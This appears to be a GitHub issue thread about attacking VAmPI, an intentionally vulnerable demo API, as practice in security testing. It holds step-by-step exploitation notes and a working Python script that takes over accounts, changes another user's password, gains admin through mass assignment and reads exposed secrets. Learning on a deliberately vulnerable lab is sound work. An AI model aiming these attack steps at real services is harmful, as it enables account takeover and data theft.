Share attack scripts
Hi,
I can see the doc says this demo app supports multiple attacks, but I don't see attack payloads. So can you please share them so I can also test these attacks?
Thanks, Jani
Hey @janibashamd, attack payloads are not provided. All the attacks, though, are pretty straightforward. Might be an idea to create a Postman collection with the usual payloads (SQLi, mass assignment etc.).
Yes, for a novice user like me it will be really helpful if you can provide steps for each attack or provide us a Postman collection for each attack.
@erev0s At least tell me about the SQLi and ReDoS attack generation steps please. I am trying these 2 as per the docs, but it seems like the attack is not getting generated.
I will really appreciate it if you can provide the above 2 attacks, as it's a little critical for me.
@erev0s Below are my observations:

API1:2019 Broken Object Level Authorization (not entirely sure)
- Create new user "jani/jani/[email protected]"
- Login to user "jani/jani" using the login API and copy the auth token
- Provide the auth token of jani in the update email API and change it for name1 ({{baseUrl}}/users/v1/name1/email)
- Issue: As per the URL the email should be updated for "name1", but I observed the email getting changed for the "jani" user (token owner, not the URL object)

API2:2019 Broken User Authentication - Unauthorized Password Change
- Create new user "jani/jani/[email protected]"
- Login to user "jani/jani" using the login API and copy the auth token
- Provide the auth token of jani in the update password API and change it for name1 ({{baseUrl}}/users/v1/name1/password)
- Issue: Even though the token is from the "jani" user, we are able to update the password of a different user, "name1"

API3:2019 Excessive Data Exposure through the debug endpoint: {{baseUrl}}/users/v1/_debug

API5:2019 Broken Function Level Authorization
- We can create new users with admin privileges using the admin key as below: { "username": "test", "password": "test", "email": "[email protected]", "admin": "True" }

API6:2019 Mass Assignment
- GET {{baseUrl}}/books/v1/JaniBook2 with any token gives any book's details, including the secret of other users
Please let me know if my assumptions are incorrect.
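The five observations above turned into a repeatable script, as an added example that is not code from VAmPI, from the Postman collection, or from anyone in this thread. Only the three `{{baseUrl}}` paths quoted in the observations come from the thread; the register and login paths, the `Authorization: Bearer` header, the HTTP methods, the JSON field names (`auth_token`, `users`, `secret`) and the use of `_debug` to see whose record actually changed are all assumptions made for this example. It uses only the standard library, and the `opener` argument lets the same checks run against a fake server offline.

```python
"""Added example (not VAmPI's own code): replay the thread's five checks with urllib.

Assumed routes/fields (only DEBUG and the two /users/v1/<name>/... paths are from the thread).
"""
import json
import urllib.request
from urllib.error import HTTPError

REGISTER = "/users/v1/register"  # assumption
LOGIN = "/users/v1/login"        # assumption
DEBUG = "/users/v1/_debug"       # quoted in the thread


def to_json(obj):
    return json.dumps(obj).encode()


def from_json(raw):
    """Decode a JSON body; fall back to text so a non-JSON error page does not crash a check."""
    try:
        return json.loads(raw or b"null")
    except ValueError:
        return raw.decode(errors="replace")


def build(base_url, method, path, body=None, token=None):
    """One request; the token goes in an assumed 'Authorization: Bearer' header."""
    data = to_json(body) if body is not None else None
    req = urllib.request.Request(base_url + path, data=data, method=method)
    req.add_header("Content-Type", "application/json")
    if token:
        req.add_header("Authorization", "Bearer " + token)
    return req


def send(req, opener=urllib.request.urlopen):
    """Return (status, decoded body); 4xx/5xx are returned as data, not raised."""
    try:
        with opener(req) as resp:
            return resp.status, from_json(resp.read())
    except HTTPError as err:
        return err.code, from_json(err.read())


def login(base_url, username, password, opener=urllib.request.urlopen):
    body = {"username": username, "password": password}
    status, data = send(build(base_url, "POST", LOGIN, body), opener)
    return data.get("auth_token") if status == 200 and isinstance(data, dict) else None


def users_in(debug_body):
    return debug_body.get("users", []) if isinstance(debug_body, dict) else []


def run_checks(base_url, attacker, victim, book_title, opener=urllib.request.urlopen):
    """Register `attacker`, then run the API1/2/3/5/6 checks against `victim`. Returns findings."""
    name, pw = attacker
    f = {}
    send(build(base_url, "POST", REGISTER,
               {"username": name, "password": pw, "email": name + "@example.com"}), opener)
    token = login(base_url, name, pw, opener)
    if not token:
        raise RuntimeError("login as attacker failed; check the assumed LOGIN route")

    # API1: attacker's token, victim's name in the URL. Which record actually changed?
    new_mail = "bola-" + name + "@example.com"
    send(build(base_url, "PUT", "/users/v1/%s/email" % victim, {"email": new_mail}, token), opener)
    dbg_status, dbg = send(build(base_url, "GET", DEBUG, token=token), opener)
    f["email_changed_for"] = sorted(u["username"] for u in users_in(dbg) if u.get("email") == new_mail)

    # API2: set the victim's password with the attacker's token, then log in as the victim.
    new_pw = "pwned-" + pw
    send(build(base_url, "PUT", "/users/v1/%s/password" % victim, {"password": new_pw}, token), opener)
    f["victim_password_changed"] = login(base_url, victim, new_pw, opener) is not None

    # API3: _debug answers 200 and includes a password field for every user.
    f["debug_exposes_passwords"] = dbg_status == 200 and any("password" in u for u in users_in(dbg))

    # API5: register with an extra "admin" field and see whether it is honoured.
    admin_name = name + "-admin"
    send(build(base_url, "POST", REGISTER, {"username": admin_name, "password": pw,
                                            "email": admin_name + "@example.com", "admin": "True"}), opener)
    _, dbg = send(build(base_url, "GET", DEBUG, token=token), opener)
    f["admin_via_register"] = any(u.get("username") == admin_name and u.get("admin") in (True, "True")
                                  for u in users_in(dbg))

    # API6 (as labelled in the thread): any valid token reads another user's book, secret included.
    status, book = send(build(base_url, "GET", "/books/v1/" + book_title, token=token), opener)
    f["book_secret_readable"] = status == 200 and isinstance(book, dict) and "secret" in book
    return f


if __name__ == "__main__":
    # Against a live instance (port is an assumption); attacker "jani/jani", victim "name1".
    print(json.dumps(run_checks("http://localhost:5000", ("jani", "jani"), "name1", "JaniBook2"), indent=2))
```

`email_changed_for` is reported as a list rather than a boolean on purpose: the thread reports the token owner's email changing instead of the URL user's, and the list shows exactly which usernames ended up with the new address, so the same check distinguishes "URL object updated" from "token owner updated" from "nothing changed". Note that the API2 check leaves the victim's password changed; run it only against your own instance.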
Updated the Postman collection with some examples for some specific attacks. You can also check the blog post here https://erev0s.com/blog/vampi-vulnerable-api-security-testing/ for more details on the rest of the attacks that do not make sense to put in an example in the collection.